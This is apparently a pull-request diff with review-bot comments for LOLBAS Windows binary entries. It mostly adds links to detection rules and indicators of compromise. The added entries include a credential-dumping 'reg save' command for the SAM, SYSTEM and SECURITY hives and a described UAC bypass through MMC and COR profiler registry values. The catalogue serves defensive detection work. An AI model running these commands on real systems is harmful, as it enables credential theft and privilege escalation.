- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||||
- IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe
|
- IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe
|
||||||
- IOC: Presence of "<CompilerInput" in a text file.
|
- IOC: Presence of "<CompilerInput" in a text file.
|
||||||
|
@ -11,16 +11,27 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.014
|
MitreID: T1218.014
|
||||||
OperatingSystem: Windows 10 (and possibly earlier versions)
|
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||||
|
- Command: mmc.exe gpedit.msc
|
||||||
|
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
|
||||||
|
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
|
||||||
|
Category: UAC Bypass
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1218.014
|
||||||
|
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mmc.exe
|
- Path: C:\Windows\System32\mmc.exe
|
||||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||||
|
- Link: https://offsec.almond.consulting/UAC-bypass-dotnet.html
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
|
- Person: clem
|
||||||
|
Handle: '@clavoillotte'
|
||||||
---
|
---
|
||||||
|
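Review bot: the new `mmc.exe gpedit.msc` entry is categorised as `UAC Bypass` but tagged `MitreID: T1218.014` (System Binary Proxy Execution: MMC); the UAC bypass itself maps to T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control), so that ID fits this command better. Also, the `Usecase:` line reads as a procedure (`Modify HKCU\Environment key in Registry with COR profiler values then launch MMC ...`) while `Description:` states the goal; consider swapping the wording so Description says what happens and Usecase says what an operator gains (elevated execution without the UAC prompt), matching the other entries. The added `sysmon_uac_bypass_dotnet_profiler.yml` rule is a file_event rule, so it pairs well with an IOC on COR profiler values appearing under `HKCU\Environment`.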
@ -32,8 +32,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml
|
||||||
- IOC: MpCmdRun storing data into alternate data streams.
|
- IOC: MpCmdRun storing data into alternate data streams.
|
||||||
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
- IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected.
|
||||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
||||||
- IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
|
- IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
|
||||||
- IOC: User Agent is "MpCommunication"
|
- IOC: User Agent is "MpCommunication"
|
||||||
|
@ -50,6 +50,17 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/5a3af872d86903c13e508348f54e3b519eb01dce/rules/windows/network_connection/silenttrinity_stager_msbuild_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
|
||||||
|
@ -16,8 +16,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml
|
||||||
- IOC: mscfgtlc.xml changes in system32 folder
|
- IOC: mscfgtlc.xml changes in system32 folder
|
||||||
- IOC: msconfig.exe executing
|
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/991314564896690177
|
- Link: https://twitter.com/pabraeken/status/991314564896690177
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -24,7 +24,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
@ -38,8 +38,27 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/05c58b4892942c34bfa01e9ada88ef2663858e1c/rules/windows/process_creation/win_susp_mshta_pattern.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_invoke_obfuscation_via_use_mhsta.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_lethalhta.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/f4ac416ef44862930730f8b7f16362b0e987bc71/rules/windows/process_creation/win_shell_spawn_mshta.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_mshta_javascript.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/image_load/sysmon_susp_script_dotnet_clr_dll_load.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||||
- IOC: Usage of HTA file
|
- IOC: General usage of HTA file
|
||||||
|
- IOC: msthta.exe network connection to Internet/WWW resource
|
||||||
|
- IOC: DotNet CLR libraries loaded into mshta.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - mshta.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||||
|
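Review bot: typo in the added IOC line `- IOC: msthta.exe network connection to Internet/WWW resource`; it should read `mshta.exe`. Separately, the first Splunk link points at `stories/suspicious_mshta_activity.yml`, which is an analytic story rather than a detection; either label it as such or link the member detections directly, as the following four Splunk entries already do.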
@ -38,7 +38,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: msiexec.exe getting files from Internet
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_msiexec_web_install.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_msiexec_cwd.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml
|
||||||
|
- IOC: msiexec.exe retrieving files from Internet
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||||
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||||
|
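Review bot: the Splunk entry `uninstall_app_using_msiexec.yml` detects msiexec.exe being used to uninstall applications, which is unrelated to the behaviour this entry documents (the Sigma `win_susp_msiexec_web_install.yml` rule and the IOC `msiexec.exe retrieving files from Internet` both concern remote package installation). Consider dropping that link or replacing it with a rule about remote or web-based MSI installation.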
@ -17,6 +17,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/0a410010a2655bc6f2aae73b9fb3b2c00ed589f7/rules/windows/process_creation/win_susp_netsh_dll_persistence.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml
|
||||||
- IOC: Netsh initiating a network connection
|
- IOC: Netsh initiating a network connection
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://freddiebarrsmith.com/trix/trix.html
|
- Link: https://freddiebarrsmith.com/trix/trix.html
|
||||||
|
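Review bot: the second Splunk link, `detections/deprecated/processes_created_by_netsh.yml`, sits in Splunk's deprecated directory, so readers would be pointed at a rule that is no longer maintained; keep only `processes_launching_netsh.yml` or mark the entry as deprecated. The Sigma rule `win_susp_netsh_dll_persistence.yml` is about helper DLL persistence, whereas the sole IOC is `Netsh initiating a network connection`; an IOC covering netsh helper DLL registration would match the linked rule.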
@ -24,7 +24,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_odbcconf.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
- Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||||
- Link: https://github.com/woanware/application-restriction-bypasses
|
- Link: https://github.com/woanware/application-restriction-bypasses
|
||||||
|
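Review bot: replacing the empty `- IOC:` placeholder with rule links leaves the odbcconf entry with no plain-language indicator, whereas the msiexec and netsh entries above keep an IOC line beside their rules. Consider adding one that states the behaviour the linked rules target (odbcconf.exe processing a response (.rsp) file such as the linked Code_Sample, or making network connections), so teams without Sigma or Elastic still know what to look for.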
@ -30,7 +30,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128
|
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -16,7 +16,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_indirect_cmd_compatibility_assistant.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/991335019833708544
|
- Link: https://twitter.com/pabraeken/status/991335019833708544
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -13,7 +13,10 @@ Commands:
|
|||||||
OperatingSystem: Windows 10,7
|
OperatingSystem: Windows 10,7
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\system32\pnputil.exe
|
- Path: C:\Windows\system32\pnputil.exe
|
||||||
Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
|
Code_Sample:
|
||||||
|
- Code: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
|
||||||
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a8a0d546f347febb0423aa920dbc10713cc1f92f/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Hai Vaknin(Lux)
|
- Person: Hai Vaknin(Lux)
|
||||||
Handle: '@LuxNoBulIshit'
|
Handle: '@LuxNoBulIshit'
|
||||||
|
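Review bot: good fix moving the bare `Code_Sample:` URL under a `- Code:` list item so the pnputil entry matches the template schema. One follow-up: the new Detection block is inserted directly before Acknowledgement and no Resources section appears in the visible context; the template orders Detection, Resources, Acknowledgement, so if the entry has no Resources block, add one (the test.inf repository link would fit there as well).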
@ -17,7 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a38c0218765a89f5d18eadd49639c72a5d25d944/rules/windows/process_creation/win_susp_presentationhost_execution.yml
|
||||||
|
- IOC: Execution of .xbap files may not be common on production workstations
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
@ -31,7 +31,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Print.exe getting files from internet
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_print.yml
|
||||||
|
- IOC: Print.exe retrieving files from internet
|
||||||
- IOC: Print.exe creating executable files on disk
|
- IOC: Print.exe creating executable files on disk
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
|
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
|
||||||
|
@ -17,6 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c44b22b52fce406d45ddb6743a02b9ff8c62c7c6/rules/windows/process_creation/win_susp_psr_capture_screenshots.yml
|
||||||
- IOC: psr.exe spawned
|
- IOC: psr.exe spawned
|
||||||
- IOC: suspicious activity when running with "/gui 0" flag
|
- IOC: suspicious activity when running with "/gui 0" flag
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -16,6 +16,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
|
||||||
- IOC: rasautou.exe command line containing -d and -p
|
- IOC: rasautou.exe command line containing -d and -p
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/fireeye/DueDLLigence
|
- Link: https://github.com/fireeye/DueDLLigence
|
||||||
|
@ -11,15 +11,28 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1564.004
|
MitreID: T1564.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak
|
||||||
|
Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material
|
||||||
|
Usecase: Dump credentials from the Security Account Manager (SAM)
|
||||||
|
Category: Credentials
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1003.002
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\reg.exe
|
- Path: C:\Windows\System32\reg.exe
|
||||||
- Path: C:\Windows\SysWOW64\reg.exe
|
- Path: C:\Windows\SysWOW64\reg.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regedit_import_keys_ads.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regedit_import_keys.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/9f27ab5426a0b061f1f2787e3dc947d6d75ad8c0/rules/windows/process_creation/win_grabbing_sensitive_hives_via_reg.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml
|
||||||
- IOC: reg.exe writing to an ADS
|
- IOC: reg.exe writing to an ADS
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
- Link: https://pure.security/dumping-windows-credentials/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
|
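Review bot: the new hive-dump command sets `OperatingSystem: Windows Vista`, while the existing entry directly above still reads `Windows vista`; fix the lowercase in the existing line while this file is being touched. Also, the Detection list gains `win_grabbing_sensitive_hives_via_reg.yml`, the Splunk `attempted_credential_dump_from_registry_via_reg_exe.yml` and the Elastic `credential_access_dump_registry_hives.toml`, but the only IOC line is still `reg.exe writing to an ADS`; add an IOC for the new command (reg.exe saving the SAM, SYSTEM or SECURITY hives to a file) so the indicator list covers both commands.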
@ -26,6 +26,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml
|
||||||
- IOC: regasm.exe executing dll file
|
- IOC: regasm.exe executing dll file
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||||
|
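Review bot: the first Splunk link in the regasm entry (`docs/_stories/suspicious_regsvcs_regasm_activity.md`) is an analytic story page rather than a detection file, while every other `Splunk:` entry in this change points at `detections/endpoint/*.yml`. Consider tagging it as `Analysis:` (the template field for write-ups) or replacing it with the detections the story bundles, so that `Splunk:` consistently means a deployable rule.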
@ -24,6 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regedit_import_keys_ads.yml
|
||||||
- IOC: regedit.exe reading and writing to alternate data stream
|
- IOC: regedit.exe reading and writing to alternate data stream
|
||||||
- IOC: regedit.exe should normally not be executed by end-users
|
- IOC: regedit.exe should normally not be executed by end-users
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -17,6 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regini_ads.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/d9edc9f0e365257aa497cc7707e58f396088958e/rules/windows/process_creation/win_regini.yml
|
||||||
- IOC: regini.exe reading from ADS
|
- IOC: regini.exe reading from ADS
|
||||||
Resources:
|
Resources:
|
||||||
